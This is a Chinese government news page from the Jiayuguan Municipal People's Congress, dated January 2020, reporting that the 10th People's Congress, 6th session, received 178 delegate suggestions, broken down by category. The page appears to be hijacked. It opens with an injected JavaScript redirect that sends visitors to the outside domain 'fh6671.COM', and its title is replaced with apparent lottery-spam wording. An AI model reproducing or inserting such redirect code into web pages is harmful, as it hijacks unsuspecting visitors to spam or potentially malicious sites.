function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划

当前位置:全天人工计划  >>  新工作动态  >>  会议专栏  >>  人代会会议  >>  十届人大六次会议  >>  要闻  
市十届人大六次会议共收到代表建议178件
来源: 嘉峪关日报      日期: 2020-01-06      作者: 赵明霞      点击数:

市十届人大六次会议共收到代表建议178件

嘉峪关日报讯(记者赵明霞)市十届人大六次会议开幕以来,来自各个方面、各条战线的市人大代表紧紧围绕市委决策部署和全市发展大局,聚焦事关全市经济社会发展和人民群众普遍关心的热点难点问题,依法向大会提出了符合市情、反映民意、具有广泛性、针对性和可操作性的意见建议。截止1月3日12时,大会秘书处共收到代表建议178件。

据介绍,这些建议中有1件是代表联名提出的关于“针对火车站站前路北段道路环境整治的议案”,经议案审查委员会审查,并经大会主席团审议通过,认为该议案不构成议案条件,作为重点意见建议处理。其余177件建议内容主要分为八大类,分别是:城市建设管理类48件,环境保护类5件,道路交通类41件,人力资源和社会保障类24件,教科文卫类23件,农业农村类17件,财经工贸类7件,社会公益和其他类12件。

今日访问量:      昨日访问量:      总访问量:
版权所有:嘉峪关市人民代表大会      地址:甘肃省嘉峪关市新华南路雄关广场东侧
电话:0937-6328604      备案许可证:陇备ICP备098838883号